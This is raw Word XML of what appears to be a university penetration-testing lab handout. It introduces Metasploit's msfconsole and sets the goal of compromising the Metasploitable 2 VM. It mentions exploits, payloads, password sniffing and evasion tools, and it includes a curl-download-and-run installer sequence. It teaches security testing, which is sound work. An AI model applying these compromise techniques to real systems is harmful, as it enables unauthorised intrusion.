        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command-line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(CLI)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penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>testing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45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learn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>how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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit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discover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identify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spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>i.e.,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>summary,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do:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="896" w:val="left" w:leader="none"/>
          <w:tab w:pos="898" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="167" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Use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Metasploit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Framework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send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vulnerability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exploitation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packets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vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="896" w:val="left" w:leader="none"/>
          <w:tab w:pos="898" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="87" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Use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Metasploit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Framework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compromise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vulnerable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system,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i.e.,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Metasploitable2.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  <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:64.255997pt;margin-top:13.655227pt;width:475.2pt;height:4pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15718912;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1285,273" coordsize="9504,80">
            <v:rect style="position:absolute;left:1285;top:273;width:1674;height:80" filled="true" fillcolor="#000000" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:line style="position:absolute" from="1285,278" to="10789,278" stroked="true" strokeweight=".498pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="588" w:val="left" w:leader="none"/>
          <w:tab w:pos="589" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="149" w:after="0"/>
        <w:ind w:left="588" w:right="0" w:hanging="404"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250007" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Background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bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="123"/>
        <w:ind w:left="185" w:right="385"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit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about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and aids in penetration testing and IDS signature development. Boston, Massachusetts-based security company</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Rapid7 owns it. Its best-known sub-project is the open-source Metasploit Framework, a tool for developing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>executing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against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remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>The Metasploit Project includes anti-forensic and evasion tools, some of which are built into the Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Framework. Metasploit is pre-installed in the Kali Linux operating system. In this lab, we use the command-line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>version,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>msfconsole,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runs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Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="386" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pP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Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>consists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core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base,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exploits,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>payloads,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Ruby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>classes),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>plugin’s, scripts, and multiple user interfaces. The Metasploit framework also contains some great information-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>gathering tools called auxiliary modules. Auxiliary modules can be used for port scanning, service identification,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>password sniffing, and Windows patch enumeration. Metasploit is highly customizable for advanced users and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95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customized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meet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custom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>needs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writing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own</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploits,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>modules,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>plugins,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scripts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit does not provide the information gathering module you need by default, you can simply write it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="4"/>
        <w:ind w:left="185" w:right="387" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The msfconsole is the user interface known to be the most stable interface, and you can use it to execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>external commands like the ping command and the tab auto-completion. A graphical user interface is available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15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>called</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Armitage,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>covered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lab.</w:t>
      </w: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562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250006" w:id="2"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Basic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you are on Kali Linux rolling edition, you can start the Metasploit framework and msfconsole by clicking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>icon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start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PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>service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Metasploit service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>automatically.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0" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250005" w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>Setup and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bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:ind w:left="18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check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Metasploit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installed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msfconsole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-v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70"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A typical response can be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>looked like: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Framework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Version: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6.0.13-dev-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69"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit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installed,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below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install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="248" w:lineRule="exact" w:before="166"/>
        <w:ind w:left="399"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:74.980003pt;margin-top:9.931994pt;width:453.8pt;height:59.8pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-16195584" coordorigin="1500,199" coordsize="9076,1196" path="m10575,1155l1500,1155,1500,1394,10575,1394,10575,1155xm10575,199l1500,199,1500,438,1500,677,1500,916,1500,1155,10575,1155,10575,916,10575,677,10575,438,10575,199xe" filled="true" fillcolor="#e5e5e5" stroked="false">
            <v:path arrowok="t"/>
            <v:fill type="solid"/>
            <w10:wrap type="none"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="239" w:lineRule="exact"/>
        <w:ind w:left="798"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="239" w:lineRule="exact"/>
        <w:ind w:left="798"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="104"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1079" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="239" w:lineRule="exact"/>
        <w:ind w:left="399"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>$</w:t>
        <w:tab/>
        <w:t>metasploit-framework-wrappers/msfupdate.erb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-10"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>msfinstall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="248" w:lineRule="exact"/>
        <w:ind w:left="399"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>755</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>msfinstall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="248" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun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rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="399"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:453.8pt;height:23.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#e5e5e5" stroked="false">
            <w10:anchorlock/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$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./msfinstall</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="248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$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msfupdate</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:ind w:left="484"/>
        <w:jc w:val="both"/>
      </w:pP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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit,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issue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tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="165"/>
        <w:ind w:left="399"/>
        <w:jc w:val="both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msfconsole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2"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pP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5" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250004" w:id="4"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Use,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>back,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6"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>use </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command in Metasploit is used to activate a particular module and changes the context of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>msfconsole to that particular module. The exploit name will be mentioned in red on the command line as in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.1.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1867623</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>142261</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3914489" cy="1894808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489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39"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.1</w:t>
      </w:r>
